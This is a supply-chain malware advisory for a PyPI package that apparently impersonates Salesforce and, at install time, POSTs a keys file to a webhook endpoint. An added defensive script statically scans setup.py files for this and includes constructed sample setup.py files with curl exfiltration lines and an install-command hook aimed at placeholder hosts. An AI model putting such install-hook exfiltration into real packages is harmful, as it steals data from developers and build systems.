CRITICAL PyPI Malware

Malicious code in salesforce-sysutils-diagnostics (PyPI)

MAL-2026-5754


Description
Source: amazon-inspector (59e4ce1338f2439a1a5b2d257b96aadaef4a9c2883f6787343856728514bd148)

setup.py unconditionally invokes curl at install time to POST the contents of /tmp/fake-keys.json to https://webhook.site/20ed745d-ee73-4b79-ab06-5b106255c38c, an anonymous request-capture endpoint. stderr is redirected to DEVNULL to suppress install-time output. The package additionally impersonates the Salesforce brand (name 'salesforce-sysutils-diagnostics') with no Author or Home-page metadata in PKG-INFO, consistent with a brand-confusion lure. Any developer or build system that runs pip install salesforce-sysutils-diagnostics will trigger an outbound POST to the attacker-controlled webhook on every install.

Source: kam193 (df69f7ee7e4cb191b719367d5d707c8c244f50c35d1af182e5b9cec73dd1937c)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.
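Both analyses above come down to the same two indicators: a process is spawned while setup.py is being executed (here curl, with stderr sent to DEVNULL), and the setuptools install command may be overridden through cmdclass so the code runs on every source install. The following script is an added example, not code from the advisory or from either analysis source; it statically parses a setup.py with the standard-library `ast` module (it never executes the file) and reports those indicators. The two setup.py samples, the package names in them and the `webhook.example.invalid` / `example.invalid` URLs are constructed placeholders.

```python
"""Static check for install-time execution in a setup.py (added example)."""
import ast
from dataclasses import dataclass

# Calls that hand control to a shell or an external process.
EXEC_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen",
}
NETWORK_TOOLS = {"curl", "wget"}
# setuptools commands commonly subclassed to hook the install.
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py"}


@dataclass(frozen=True)
class Finding:
    line: int
    reason: str


def _dotted_name(node):
    """Return 'pkg.attr' for Name/Attribute chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _argv0(call):
    """First token of the command a process-execution call would run."""
    if not call.args:
        return None
    arg = call.args[0]
    if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
        tokens = arg.value.split()
        return tokens[0] if tokens else None
    if isinstance(arg, (ast.List, ast.Tuple)) and arg.elts:
        first = arg.elts[0]
        if isinstance(first, ast.Constant) and isinstance(first.value, str):
            return first.value
    return None


def scan_setup_py(source: str) -> list:
    """Parse (never execute) a setup.py and list install-time risk indicators."""
    tree = ast.parse(source)
    # Expression statements at module level run on every build from an sdist.
    top_level_calls = {
        id(stmt.value) for stmt in tree.body
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
    }
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                where = "at module level" if id(node) in top_level_calls else "inside a function"
                findings.append(Finding(node.lineno, f"process execution via {name} {where}"))
                argv0 = _argv0(node)
                if argv0 in NETWORK_TOOLS:
                    findings.append(Finding(node.lineno, f"runs network tool '{argv0}'"))
                for kw in node.keywords:
                    if kw.arg == "stderr" and (_dotted_name(kw.value) or "").endswith("DEVNULL"):
                        findings.append(Finding(node.lineno, "stderr redirected to DEVNULL (output suppressed)"))
            elif name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(Finding(node.lineno, "setup() passes cmdclass (custom install hook)"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                bname = _dotted_name(base)
                if bname and bname.split(".")[-1] in SETUPTOOLS_COMMANDS:
                    findings.append(Finding(node.lineno, f"class {node.name} overrides setuptools command '{bname}'"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings.append(Finding(node.lineno, f"hard-coded URL {node.value}"))
    return sorted(findings, key=lambda f: (f.line, f.reason))


# Constructed sample: module-level curl POST with stderr suppressed (placeholder URL).
SUSPICIOUS_SETUP = """\
import subprocess
from setuptools import setup
subprocess.run(
    ["curl", "-X", "POST", "--data-binary", "@/tmp/fake-keys.json",
     "https://webhook.example.invalid/PLACEHOLDER-ID"],
    stderr=subprocess.DEVNULL,
)
setup(name="constructed-sample-pkg", version="0.1")
"""

# Constructed sample: install command overridden via cmdclass (placeholder URL).
HOOKED_SETUP = """\
import os
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        os.system("curl https://example.invalid/ping")
        install.run(self)

setup(name="constructed-hooked-pkg", version="0.1", cmdclass={"install": PostInstall})
"""

# Constructed sample with nothing to report.
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="harmless-lib", version="1.0")\n'

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("hooked", HOOKED_SETUP), ("benign", BENIGN_SETUP)):
        print(label, [f"{f.line}: {f.reason}" for f in scan_setup_py(src)])
```

This is a heuristic for triage, not a verdict: obfuscated or dynamically built commands will not match the string patterns, so treat a hit as a reason to read the file, and an empty result as nothing more than the absence of the obvious patterns. Installing from wheels only (`pip install --only-binary :all:`) sidesteps setup.py execution entirely, since a wheel install never runs it.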
